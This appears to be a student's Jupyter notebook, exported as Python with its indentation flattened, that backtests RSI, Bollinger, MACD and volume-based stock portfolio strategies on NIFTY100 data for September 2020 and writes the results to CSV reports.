Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\NIFTY100 RSI MACD 415 Buy_Sell list.csv')
Consolidated_Report_df_final = Consolidated_Report_df.drop_duplicates(subset=['Stock/Index', 'KPI', 'Criteria', 'Transaction'], keep='first', inplace=False)
Summary_Report_df_final = Summary_Report_df.drop_duplicates(subset=['Stock/Index', 'KPI', 'Criteria', 'Net Profit/Loss'], keep='first', inplace=False)
Consolidated_Report_df_final.sort_values(['Value', 'Stock/Index', 'KPI'], ascending = False)
Summary_Report_df_final.sort_values(['Net Profit/Loss', 'Number of Txns'], ascending = False)
# # PORTFOLIO SELECTION
# +
## NOW that back-testing proves the following KPIs in order to over-achieve NIFTY100 returns
## 1. Bollinger, RSI > 25
## 2. OBV
## 3. RSI>25, MACD with [(EMA4- EMA15) -EMA9]
## Lets try for options 1 and 3 if we had just done top 10 stocks instead of all 100 stocks
# +
# Prepare the Stock selection based on MACD and CLOSE PROCE
# MACD = 4-day EMA - 15-day EMA
daily_data_back_test['ema4'] = daily_data_back_test['Close'].transform(lambda x:x.ewm(span=4).mean())
daily_data_back_test['ema15'] = daily_data_back_test['Close'].transform(lambda x:x.ewm(span=15).mean())
daily_data_back_test['macd_revised'] = daily_data_back_test['ema4'] - daily_data_back_test['ema15']
## for cross over - calculate macd9
daily_data_back_test['macd9'] = daily_nifty_back_test['macd_revised'].transform(lambda x:x.ewm(span=9).mean())
daily_data_back_test['macd4/close'] = daily_data_back_test['macd_revised'] / daily_data_back_test['Close']
# -
## PORTFOLIO 1 SELECTION BASED ON MACD (4, 15) DIVIDED BY CLOSE PRICE.
# THIS WOULD HELP US TO ENSURE THAT WE CAN GET DIFFERENT PRICE RATHER THAN HIGHER END STOCKS
daily_data_back_test_rank = daily_data_back_test
daily_data_back_test_rank['rank - macd4/close'] = abs(daily_data_back_test_rank['macd4/close']).rank()
Stock_data_ranked = daily_data_back_test_rank.sort_values("rank - macd4/close", ascending= True)
Stock_data_ranked.reset_index().head(10)
Stock_Selected = []
Stock_Selected = Stock_data_ranked['Symbol'].head(10)
portfolio_stocks = pd.Series(Stock_Selected)
portfolio_stocks = portfolio_stocks.tolist()
daily_data_stock_selected = daily_data_back_test.loc[daily_data_back_test['Symbol'].isin(portfolio_stocks)]
portfolio_stocks
# +
# 1. Lets try with Bollinger and RSI > 25 but with data limited to top 10 stocks
daily_data_stock_selected['TradingStrategyRSI_revised'] = np.where(daily_data_stock_selected['rsi'] > 25, "positive", "negative")
# REMOVE THE EFFECT OF OBV AND SEE IF WE GET A POSITIVE WAY FORWARD - SO JUST BOLLING AND RSI (with RSI > 30 for Buy call)
df1_grouped = daily_data_stock_selected.groupby('Symbol')
COMBINED = [0]
for group_keys, df_group in df1_grouped:
i = 0
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if i == 0 :
COMBINED.append("WAIT")
else:
if df_group.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
if df_group.loc[row_index, 'TradingStrategyRSI_revised'] == "positive":
COMBINED.append("ENTER")
else:
COMBINED.append("SELL")
else:
COMBINED.append("WAIT")
i = i + 1
# convert the series to dataframe with column as COMBINED
dataframe_COMBINED = pd.DataFrame(COMBINED,columns=['COMBINED'])
# remove the first row since the append was started with COMBINED[0] - this way this would align to the length of the original dataframe
dataframe_COMBINED_corrected = dataframe_COMBINED[1:]
dataframe_COMBINED_corrected.tail()
# add the Combined Strategy value to the existing daily_data dataframe
daily_data_stock_selected['TradingStrategyCombined_bol_rsi_revised'] = dataframe_COMBINED_corrected['COMBINED'].values
# REVISION5 BASED ON BACK-TESTING FOR COMBINED STRATEGY
# BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
df1_grouped = daily_data_stock_selected.groupby('Symbol')
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 100000 # investment of 10 lakhs for 10 stocks
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if next_step == 0:
if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi_revised'] == "SELL":
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Sell")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
money = money + row['Close'] * number_stock
next_step = 1
j = j + 1
else: # first time I have to buy
if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi_revised'] == "ENTER":
number_stock = money // row['Close'] # floor division to get the integer number of stocks
if number_stock > 0:
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Buy")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
money = money - row['Close'] * number_stock
next_step = 0
j = j + 1
i = i + 1
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 5
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
#del Buy_Sell_dataframe_r
#del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
date = "2020-08-28"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = daily_data_stock_selected[(daily_data_stock_selected['Symbol'] == row['Symbol']) & (daily_data_stock_selected['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "Portfolio 3: Bollinger, RSI", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
# number of positives we got is 53 out of 100 (no where close to 66% thats expected)
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Portfolio 3 Bollinger RSI 25 Buy_Sell list.csv')
# # PORTFOLIO RETURNS FOR THE 3 TOP PERFORMING KPIs
# store the data in an excel
Buy_Sell_Summary_r.to_csv('D:\Personal\Analytics course\IPBA\Case Study\Output\Back_Test Stock Summary Aug-20.csv')
concat_Buy_Sell.to_csv('D:\Personal\Analytics course\IPBA\Case Study\Output\Back_Test Stock Txn details Aug-20.csv')
Consolidated_Report_df.to_csv('D:\Personal\Analytics course\IPBA\Case Study\Output\Back_test Consolidated report Aug-20.csv')
Summary_Report_df.to_csv('D:\Personal\Analytics course\IPBA\Case Study\Output\Back_test Summary report Aug-20.csv')
## PORTFOLIO 2: SELECTION BASED ON % CHANGE IN CLOSE PRICE
# determine which stocks to buy. first look at price change each day for each stock
daily_data_back_test['dailypricechange'] = np.log(daily_data_back_test.groupby('Symbol')['Close'].pct_change().add(1))
daily_data_back_test_rank = daily_data_back_test
daily_data_back_test_rank['rank - dailypricechange'] = daily_data_back_test_rank['dailypricechange'].rank()
Stock_data_ranked = daily_data_back_test_rank.sort_values("dailypricechange", ascending= True)
Stock_data_ranked.reset_index().head(10)
Stock_Selected = []
Stock_Selected = Stock_data_ranked['Symbol'].head(10)
portfolio_stocks = pd.Series(Stock_Selected)
portfolio_stocks = portfolio_stocks.tolist()
daily_data_stock_selected = daily_data_back_test.loc[daily_data_back_test['Symbol'].isin(portfolio_stocks)]
portfolio_stocks
## PORTFOLIO 3: SELECTION BASED ON % CHANGE IN volume each day by stock - take those that are having high volume change
daily_data_back_test['dailyvolumechange'] = np.log(daily_data_back_test.groupby('Symbol')['Volume'].pct_change().add(1))
daily_data_back_test_rank = daily_data_back_test
daily_data_back_test_rank['rank - dailyvolumechange'] = daily_data_back_test_rank['dailyvolumechange'].rank()
Stock_data_ranked = daily_data_back_test_rank.sort_values("dailyvolumechange", ascending= True)
Stock_data_ranked.reset_index().head(10)
Stock_Selected = []
Stock_Selected = Stock_data_ranked['Symbol'].head(10)
portfolio_stocks = pd.Series(Stock_Selected)
portfolio_stocks = portfolio_stocks.tolist()
daily_data_stock_selected = daily_data_back_test.loc[daily_data_back_test['Symbol'].isin(portfolio_stocks)]
portfolio_stocks
# # TEST FOR SEP DATA - STOCK
# +
## TEST FOR SEP'20 - EACH WEEK BASED ON PORTFOLIO 2 - WITH 2 OPTIONS:
# A) RSI/BOLLINGER
# B) RSI/MACD - 4,15
# COMPARE AGAINST NIFTY MOVEMENT FOR SEP'2020
# -
## data selection for each week
week_start_dates = ['2020-08-31', '2020-09-07', '2020-09-14', '2020-09-21', '2020-09-28']
week_end_dates = ['2020-09-04', '2020-09-11', '2020-09-18', '2020-09-25', '2020-10-02']
mask = ((daily_data['Date'] >= '2020-08-31') & (daily_data['Date'] <= '2020-09-04'))
daily_data_sep_2020 = daily_data.loc[mask]
week_end = week_end_dates[0]
def weekly_portfolio_stock_selection (weekly_data):
## PORTFOLIO 2: SELECTION BASED ON % CHANGE IN CLOSE PRICE
# determine which stocks to buy. first look at price change each day for each stock
weekly_data['dailypricechange'] = np.log(weekly_data.groupby('Symbol')['Close'].pct_change().add(1))
weekly_data_rank = weekly_data
weekly_data_rank['rank - dailypricechange'] = weekly_data_rank['dailypricechange'].rank()
Stock_data_ranked = weekly_data_rank.sort_values("dailypricechange", ascending= True)
Stock_data_ranked.reset_index().head(10)
Stock_Selected = []
Stock_Selected = Stock_data_ranked['Symbol'].head(10)
portfolio_stocks = pd.Series(Stock_Selected)
portfolio_stocks = portfolio_stocks.tolist()
selected_weekly_data = weekly_data.loc[weekly_data['Symbol'].isin(portfolio_stocks)]
return(selected_weekly_data)
def weekly_portfolio1_stock_selection (weekly_data):
## PORTFOLIO 1 SELECTION BASED ON MACD (4, 15) DIVIDED BY CLOSE PRICE.
# THIS WOULD HELP US TO ENSURE THAT WE CAN GET DIFFERENT PRICE RATHER THAN HIGHER END STOCKS
weekly_data['ema4'] = weekly_data.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=4).mean())
weekly_data['ema15'] = weekly_data.groupby('Symbol')['Close'].transform(lambda x:x.ewm(span=15).mean())
weekly_data['macd_revised'] = weekly_data['ema4'] - weekly_data['ema15']
## for cross over - calculate macd9
weekly_data['macd9'] = weekly_data['macd'].transform(lambda x:x.ewm(span=9).mean())
weekly_data['macd4/close'] = weekly_data['macd_revised'] / weekly_data['Close']
weekly_data_rank = weekly_data
weekly_data_rank['rank - macd4/close'] = weekly_data_rank['macd4/close'].rank()
Stock_data_ranked = weekly_data_rank.sort_values("macd4/close", ascending= True)
Stock_data_ranked.reset_index().head(10)
Stock_Selected = []
Stock_Selected = Stock_data_ranked['Symbol'].head(10)
portfolio_stocks = pd.Series(Stock_Selected)
portfolio_stocks = portfolio_stocks.tolist()
selected_weekly_data = weekly_data.loc[weekly_data['Symbol'].isin(portfolio_stocks)]
return(selected_weekly_data)
## PORTFOLIO 3: SELECTION BASED ON % CHANGE IN volume each day by stock - take those that are having high volume change
def weekly_portfolio3_stock_selection (weekly_data):
## PORTFOLIO 3: SELECTION BASED ON % CHANGE IN OBV
# determine which stocks to buy. first look at price change each day for each stock
weekly_data['dailyvolumechange'] = np.log(weekly_data.groupby('Symbol')['Volume'].pct_change().add(1))
weekly_data_rank = weekly_data
weekly_data_rank['rank - dailyvolumechange'] = weekly_data_rank['dailyvolumechange'].rank()
Stock_data_ranked = weekly_data_rank.sort_values("dailyvolumechange", ascending= True)
Stock_data_ranked.reset_index().head(10)
Stock_Selected = []
Stock_Selected = Stock_data_ranked['Symbol'].head(10)
portfolio_stocks = pd.Series(Stock_Selected)
portfolio_stocks = portfolio_stocks.tolist()
selected_weekly_data = weekly_data.loc[weekly_data['Symbol'].isin(portfolio_stocks)]
return(selected_weekly_data)
# +
# 1. Lets try with Bollinger and RSI > 25 but with data limited to top 10 stocks
def weekly_stock_buy_and_sell (weekly_stock_selected, week_num, stock_in_portfolio, weekly_money):
weekly_stock_selected['TradingStrategyRSI_revised'] = np.where(weekly_stock_selected['rsi'] > 25, "positive", "negative")
# REMOVE THE EFFECT OF OBV AND SEE IF WE GET A POSITIVE WAY FORWARD - SO JUST BOLLING AND RSI (with RSI > 30 for Buy call)
df1_grouped = weekly_stock_selected.groupby('Symbol')
COMBINED = [0]
weekly_stock_sell = []
for group_keys, df_group in df1_grouped:
i = 0
for row_index, row in df_group.iterrows():
if i <= df_group.index[-1] :
if i == 0 :
COMBINED.append("WAIT")
else:
if df_group.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
if df_group.loc[row_index, 'TradingStrategyRSI_revised'] == "positive":
COMBINED.append("ENTER")
else:
COMBINED.append("SELL")
else:
COMBINED.append("WAIT")
i = i + 1
# convert the series to dataframe with column as COMBINED
dataframe_COMBINED = pd.DataFrame(COMBINED,columns=['COMBINED'])
# remove the first row since the append was started with COMBINED[0] - this way this would align to the length of the original dataframe
dataframe_COMBINED_corrected = dataframe_COMBINED[1:]
dataframe_COMBINED_corrected.tail()
# add the Combined Strategy value to the existing daily_data dataframe
weekly_stock_selected['TradingStrategyCombined_bol_rsi_revised'] = dataframe_COMBINED_corrected['COMBINED'].values
# Check if stocks to sell (Weekly signal) is in stocks_portfolio
if len(stock_in_portfolio) > 0:
for item in stock_in_portfolio:
if item in weekly_stock_sell:
stock_to_sell.append(item)
number_of_buytxn = 0
temp_week_buy_txn = weekly_stock_selected[(weekly_stock_selected['TradingStrategyRSI_revised'] == "positive") & (weekly_stock_selected['TradingStrategyBollinger'] == "Buy")]
number_of_buytxn = temp_week_buy_txn['Symbol'].nunique()
# REVISION5 BASED ON BACK-TESTING FOR COMBINED STRATEGY
# BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
sell_stock_portfolio = 0
sell_stock_portfolio = weekly_stock_selected['Symbol'].isin(stock_in_portfolio).any().any()
df1_grouped = weekly_stock_selected.groupby('Symbol')
Back_Test_10yrs_r = []
add_stock = []
sell_stock_portfolio = 1
total_buy_value = 0
total_sell_value = 0
money_per_stock = 0
if number_of_buytxn > 0 :
for group_keys, df_group in df1_grouped:
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
next_step = 1 # 1 - Buy, 0 - Sell
money_per_stock = weekly_money // number_of_buytxn #distributing equally to all 10 stocks - 10% of available money
for row_index, row in df_group.iterrows():
sell_value = 0
buy_value = 0
if i <= df_group.index[-1] :
if money_per_stock > 0:
if next_step == 0:
if sell_stock_portfolio:
if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi_revised'] == "SELL":
Back_Test_10yrs_r.append(week_num)
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Sell")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
sell_value = number_stock * row['Close']
total_sell_value = total_sell_value + sell_value
money_per_stock = money_per_stock + row['Close'] * number_stock
next_step = 1
remove_stock.append(row['Symbol'])
j = j + 1
else: # first time I have to buy
if money_per_stock > 0:
if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi_revised'] == "ENTER":
number_stock = money_per_stock // row['Close'] # floor division to get the integer number of stocks
if number_stock > 0:
Back_Test_10yrs_r.append(week_num)
Back_Test_10yrs_r.append(row['Date'])
Back_Test_10yrs_r.append(row['Symbol'])
Back_Test_10yrs_r.append("Buy")
Back_Test_10yrs_r.append(row['Close'])
Back_Test_10yrs_r.append(number_stock)
money_per_stock = money_per_stock - row['Close'] * number_stock
next_step = 0
buy_value = number_stock * row['Close']
total_buy_value = total_buy_value + buy_value
add_stock.append(row['Symbol'])
stock_to_sell.append(row['Symbol'])
j = j + 1
i = i + 1
weekly_money = weekly_money + total_sell_value - total_buy_value
temp_portfolio = []
stock_in_portfolio.append(add_stock)
for item in stock_in_portfolio:
if item not in remove_stock:
temp_portfolio.append(item)
stock_in_portfolio = temp_portfolio
# Split the consolidate list into multiple lists with 6 columns each for the list row
n = 6
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
Buy_Sell_dataframe_r = []
# move to dataframe
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
if len(Buy_Sell_list_r) > 0:
Buy_Sell_dataframe_r.columns = ['Week#', 'Date', 'Symbol', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
return(Buy_Sell_dataframe_r, stock_in_portfolio, weekly_money)
# -
## SUMMARIZE FOR REPORTING for BACKTESTING
def Summarize_Report_Weekly (stock_index, kpi, criteria, temp_data):
buy_value = 0
buy_count = 0
sell_value = 0
sell_count = 0
profit_loss = 0
list1 = []
list2 = []
for row_index, row in temp_data.iterrows():
weeknum = row['Week#']
if (row['Txn'] == "Buy") :
buy_value = buy_value + row['Value']
buy_count = buy_count + 1
else:
sell_value = sell_value + row['Value']
sell_count = sell_count + 1
list1.append(stock_index)
list1.append(kpi)
list1.append(criteria)
list1.append(weeknum)
list1.append("Buy")
list1.append(buy_value)
list1.append(buy_count)
list1.append(stock_index)
list1.append(kpi)
list1.append(criteria)
list1.append(weeknum)
list1.append("Sell")
list1.append(sell_value)
list1.append(sell_count)
# calculate net profit (Sell - Buy)
profit_loss = sell_value - buy_value
list2.append(stock_index)
list2.append(kpi)
list2.append(criteria)
list2.append(profit_loss)
list2.append(investment)
list2.append(sell_count)
roi = (profit_loss/investment)*100
list2.append(roi)
# add the rows to dataframe - CONSOLIDATED REPORT
n = 7
add_rows_split = []
add_rows_split = list(divide_chunks(list1, n))
temp1_df = pd.DataFrame(add_rows_split, columns=['Stock/Index', 'KPI', 'Criteria', 'Week#', 'Transaction', 'Value', 'Number of Txns'])
# Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp_df])
# add the rows to dataframe - SUMMARY REPORT
n = 7
add_rows_split = []
add_rows_split = list(divide_chunks(list2, n))
temp2_df = pd.DataFrame(add_rows_split, columns=['Stock/Index', 'KPI', 'Criteria', 'Net Profit/Loss', 'Investment', 'Number of Txns', 'ROI'])
# Summary_Report_df = pd.concat([Summary_Report_df, temp_df])
return temp1_df, temp2_df
# PORTFOLIO 2
week_start_dates = ['2020-08-31', '2020-09-07', '2020-09-14', '2020-09-21', '2020-09-28']
week_end_dates = ['2020-09-04', '2020-09-11', '2020-09-18', '2020-09-25', '2020-10-02']
#week_start_dates = ['2010-01-04']
#week_end_dates = ['2020-08-31']
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
stock_in_portfolio = []
stock_to_sell = []
remove_stock = []
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
week_start = week_start_dates [i]
week_end = week_end_dates [i]
mask = ((daily_data['Date'] >= week_start) & (daily_data['Date'] <= week_end))
weekly_data = daily_data.loc[mask]
weekly_data_selected = weekly_portfolio_stock_selection (weekly_data)
week_number = str("Week".join(str(i)))
if i == 0:
available_money = portfolio_money
weekly_portfolio, stock_in_portfolio, money_available = weekly_stock_buy_and_sell(weekly_data_selected, week_number, stock_in_portfolio, available_money)
consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
available_money = money_available
i = i + 1
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
# +
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 01st Oct as the price for book-closure
add_rows_list = []
row_count = consolidated_portfolio.shape[0]
i = 0
for index_row, row in consolidated_portfolio.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
add_rows_list.append(week_number)
date = "2020-10-01"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = weekly_data[(weekly_data['Symbol'] == last_symbol) & (weekly_data['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
add_rows_list.append(week_number)
date = "2020-10-01"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = weekly_data[(weekly_data['Symbol'] == row['Symbol']) & (weekly_data['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 7
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([consolidated_portfolio, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# #### RETURNS FOR SEP'20 ---- NOT ALIGNED TO THE RETURNS FOR STOCKS SEEN OVER PAST 10 YEARS
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Stock - Sep", "Portfolio2: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
# PORTFOLIO 3
week_start_dates = ['2020-08-31', '2020-09-07', '2020-09-14', '2020-09-21', '2020-09-28']
week_end_dates = ['2020-09-04', '2020-09-11', '2020-09-18', '2020-09-25', '2020-10-02']
#week_start_dates = ['2010-01-04']
#week_end_dates = ['2020-08-31']
i = 0
portfolio_money = 1000000 # investment of 10 lakhs
available_money = 0
stock_in_portfolio = []
stock_to_sell = []
remove_stock = []
consolidated_list = []
consolidated_portfolio = pd.DataFrame([consolidated_list])
for item in week_start_dates:
week_start = week_start_dates [i]
week_end = week_end_dates [i]
mask = ((daily_data['Date'] >= week_start) & (daily_data['Date'] <= week_end))
weekly_data = daily_data.loc[mask]
weekly_data_selected = weekly_portfolio_stock_selection (weekly_data)
week_number = str("Week".join(str(i)))
if i == 0:
available_money = portfolio_money
weekly_portfolio, stock_in_portfolio, money_available = weekly_stock_buy_and_sell(weekly_data_selected, week_number, stock_in_portfolio, available_money)
consolidated_portfolio = pd.concat([consolidated_portfolio, weekly_portfolio])
available_money = money_available
i = i + 1
consolidated_portfolio = consolidated_portfolio.dropna(how='any',axis=0)
# +
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 01st Oct as the price for book-closure
add_rows_list = []
row_count = consolidated_portfolio.shape[0]
i = 0
for index_row, row in consolidated_portfolio.iterrows():
if i == 0:
last_symbol = row['Symbol']
last_qty = row['Qty']
last_txn = row['Txn']
i = i + 1
else:
if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
add_rows_list.append(week_number)
date = "2020-10-01"
add_rows_list.append(date) # Date
add_rows_list.append(last_symbol) # Symbol
add_rows_list.append("Sell") # Sell
price = weekly_data[(weekly_data['Symbol'] == last_symbol) & (weekly_data['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(last_qty) # qty
value = price * last_qty
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
else:
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
if ((i == row_count) and (row['Txn'] == "Buy")):
add_rows_list.append(week_number)
date = "2020-10-01"
add_rows_list.append(date) # Date
add_rows_list.append(row['Symbol']) # Symbol
add_rows_list.append("Sell") # Sell
price = weekly_data[(weekly_data['Symbol'] == row['Symbol']) & (weekly_data['Date'] == date)]['Close'].values[0]
add_rows_list.append(price) # Close price per the last date for that stock
add_rows_list.append(row['Qty']) # qty
value = price * row['Qty']
add_rows_list.append(value)
last_txn = row['Txn']
last_symbol = row['Symbol']
last_qty = row['Qty']
i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 7
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Week#', 'Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([consolidated_portfolio, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# SUMMARIZE THE REPORTING FOR THE WEEKLY DATA
investment = 1000000 # investment of 10 lakhs
temp1_df, temp2_df = Summarize_Report_Weekly("Stock - Sep", "Portfolio3: RSI-Bollinger", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df2 = pd.concat([Consolidated_Report_df2, temp1_df], ignore_index=True)
Summary_Report_df2 = pd.concat([Summary_Report_df2, temp2_df], ignore_index=True)
Consolidated_Report_df2.head(40)
Summary_Report_df2.head(40)
# store the data in an excel
Buy_Sell_Summary_r.to_csv('D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Summary Sep-20.csv')
concat_Buy_Sell.to_csv('D:\Personal\Analytics course\IPBA\Case Study\Output\Stock Txn details Sep-20.csv')
# PORTFOLIO 1
